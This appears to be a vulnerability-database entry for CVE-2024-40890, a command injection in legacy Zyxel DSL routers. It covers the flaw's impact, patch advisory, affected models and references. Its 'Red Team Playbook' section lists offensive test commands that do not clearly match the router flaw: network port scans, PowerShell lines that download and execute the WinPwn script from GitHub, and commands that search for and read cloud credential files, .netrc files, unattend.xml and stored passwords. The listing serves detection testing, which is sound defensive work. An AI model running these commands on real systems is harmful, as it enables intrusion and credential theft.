CVE-2024-40890
Overview
This vulnerability is a post-authentication command injection affecting the CGI program within the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615. The root cause lies in insufficient input validation of HTTP POST parameters, allowing crafted input to be interpreted as operating system commands. The affected component is the device's web-based management interface handling CGI requests.
Vulnerability Description
**UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615 could allow an authenticated attacker to execute operating system (OS) commands on an affected device by sending a crafted HTTP POST request.
Impact
An attacker with valid user credentials can execute arbitrary operating system commands on the affected device, potentially gaining full control over the system. This enables actions such as data exfiltration, configuration manipulation, or pivoting within the network. The vulnerability requires authentication but no additional user interaction, allowing an authenticated attacker to escalate privileges and compromise device integrity and confidentiality, leading to potential network-wide security breaches.
Solution
Zyxel has published a security advisory addressing command injection and insecure default credentials in legacy DSL CPE devices, including VMG4325-B10A firmware. Users should apply the firmware updates provided in the advisory available at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025. The advisory includes specific firmware version updates and recommended configuration changes to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant vulnerability has been identified in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware, specifically version 1.00(AAFR.4)C0_20170615. This flaw allows authenticated attackers to execute arbitrary operating system commands through crafted HTTP POST requests. The vulnerability arises from improper input validation and sanitization within the CGI program, which fails to adequately restrict the execution of OS commands based on user input. This oversight creates a pathway for attackers who have already gained authenticated access to the device, enabling them to manipulate the system at a fundamental level.
The attack vector for this vulnerability primarily involves authenticated users leveraging their access to send specially crafted HTTP POST requests to the affected device. Once the attacker successfully authenticates, they can exploit the command injection flaw to execute arbitrary commands on the underlying operating system. This could lead to a range of malicious activities, including the installation of malware, data exfiltration, or even complete system takeover. Given that many of the affected devices are deployed in residential and small business environments, the potential for widespread exploitation is concerning, especially if attackers can pivot from these devices to compromise more critical infrastructure.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on these legacy devices for network connectivity. An attacker exploiting this flaw could gain unauthorized access to sensitive data, disrupt network services, or use the compromised device as a launching point for further attacks within the network. The business risks associated with such an incident include financial loss, reputational damage, and potential legal ramifications stemming from data breaches or service disruptions. Moreover, the presence of outdated firmware in many devices indicates a broader issue of inadequate patch management and device lifecycle management, which can exacerbate the risks associated with this vulnerability.
To detect and mitigate the risks posed by this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to conduct a thorough inventory of all network devices, identifying those that are running the affected firmware versions. Regular vulnerability scanning and penetration testing can help uncover potential exploitation paths and provide insights into the security posture of the network. Additionally, organizations should enforce strict access controls, ensuring that only authorized personnel have the ability to authenticate to these devices.
Furthermore, it is essential to establish a robust patch management process to ensure that all devices are updated with the latest firmware versions, thereby closing known vulnerabilities. In cases where firmware updates are no longer supported, organizations should consider replacing legacy devices with newer models that receive regular security updates. Implementing network segmentation can also help limit the potential impact of an exploited device, isolating critical systems from less secure environments. By adopting these strategies, organizations can significantly reduce their risk exposure and enhance their overall cybersecurity resilience against such vulnerabilities.
Affected Products (14)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Vmg1312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg1312-B10e Firmware | N/A |
cpe:2.3:o:zyxel:vmg1312-b10e_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3312-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3312-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3313-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg3313-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg3926-B10b Firmware | N/A |
cpe:2.3:o:zyxel:vmg3926-b10b_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4325-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4325-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg4380-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg4380-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8324-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8324-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Vmg8924-B10a Firmware | N/A |
cpe:2.3:o:zyxel:vmg8924-b10a_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3300-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3300-nb00_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-N000 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-n000_firmware:-:*:*:*:*:*:*:*
|
|
|
Zyxel | Sbg3500-Nb00 Firmware | N/A |
cpe:2.3:o:zyxel:sbg3500-nb00_firmware:-:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-40890 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-40890 |